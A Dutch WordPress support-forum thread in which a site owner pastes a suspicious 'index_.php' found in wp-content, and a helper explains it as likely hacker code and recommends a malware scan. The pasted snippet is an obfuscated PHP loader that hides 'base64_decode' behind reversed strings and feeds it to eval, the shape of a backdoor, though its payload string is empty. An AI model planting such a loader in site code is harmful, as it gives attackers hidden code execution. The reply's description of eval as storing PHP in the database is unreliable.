Ondersteuning » Overige » Vreemde bestanden – mogelijke hack

  • Ik vond een bestand “index_.php” in de map “wp-content”. De inhoud is voor mij onleesbaar en ik vraag mij af wat het is.

    <?php $str="";
    $str3 = strrev("46esab")."_".strrev("edoced");
    eval($str3($str));
2 reacties aan het bekijken - 1 tot 2 (van in totaal 2)
  • Hier wordt een variabele gevuld met karakters die op een later moment om worden gezet naar uitvoerbare code. Wat het precies doet is gissen maar je hebt zeker weten last van een hack als dit niet van jou is.

    In php kan de functie eval() php opslaan in je database. Handige functie maar kan ook misbruikt worden.

    De index.php bestanden in je wp-content- uploads- plugins mappen horen altijd leeg te zijn, of gevuld met de standaard tekst:
    <?php //Silence is golden

    46esab (lees ik o.a in je code) is achterstevoren base64, en dat is 8/10x hackers script.
    Eval en Base64 wil je meestal niet in je site hebben.

    Doe eens een gratis check bij sucuri

    Als je site hackers-code bevat ziet die scanner het meestal.

    Let op: code op je server kan uitgevoerd worden en je Google resultaten om zeep helpen..
    Vaak is het een reclame-injectie of spam.

    • Deze reactie is gewijzigd 6 jaren, 7 maanden geleden door wpbeveiligen.
    • Deze reactie is gewijzigd 6 jaren, 7 maanden geleden door wpbeveiligen.
2 reacties aan het bekijken - 1 tot 2 (van in totaal 2)
  • Het onderwerp ‘Vreemde bestanden – mogelijke hack’ is gesloten voor nieuwe reacties.